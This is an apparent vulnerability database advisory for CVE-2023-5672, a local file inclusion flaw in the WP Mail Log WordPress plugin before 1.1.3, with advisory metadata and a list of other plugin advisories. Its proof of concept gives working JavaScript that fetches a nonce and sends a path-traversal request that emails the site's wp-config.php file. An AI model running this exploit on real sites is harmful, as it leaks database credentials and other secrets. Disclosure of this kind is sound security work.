WP Mail Log < 1.1.3 – Contributor+ LFI in wml_logs/send_mail endpoint | CVE 2023-5672 | Plugin Vulnerabilities

Description

The plugin does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files.

Proof of Concept

Run the following within any page on the site, ensuring that the `id` parameter is set to a valid ID for a log entry. Inspect the email that is sent, and see that it contains the site's `wp-config.php` file as an attachment.

var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();

await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=1&to_email=send@example.com&includeAttachment={"../../wp-config.php":1}'})).text();

Affects Plugins

Fixed in 1.1.3

References

CVE

Classification

Type

LFI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID

7c1dff5b-bed3-49f8-96cc-1bc9abe78749

Timeline

Publicly Published

2023-11-28 (about 2 years ago)

Added

2023-11-28 (about 2 years ago)

Last Updated

2023-11-28 (about 2 years ago)

Other

Published

Title

Published

2025-08-25

Title

UPC/EAN/GTIN Code Generator < 2.0.3 - Authenticated (Subscriber+) Arbitrary File Deletion

Published

2025-04-04

Title

Drag and Drop Multiple File Upload for WooCommerce < 1.1.5 - Unauthenticated Arbitrary File Move

Published

2025-12-11

Title

Multi Uploader for Gravity Forms <= 1.1.7 - Unauthenticated Arbitrary File Deletion

Published

2025-07-17

Title

School Management System for Wordpress < 1.93.1 (02-07-2025) - Authenticated (Subscriber+) Local File Inclusion to Privilege Escalation via Password Update

Published

2025-02-22

Title

Helloprint < 2.1.0 - Subscriber+ Arbitrary File Deletion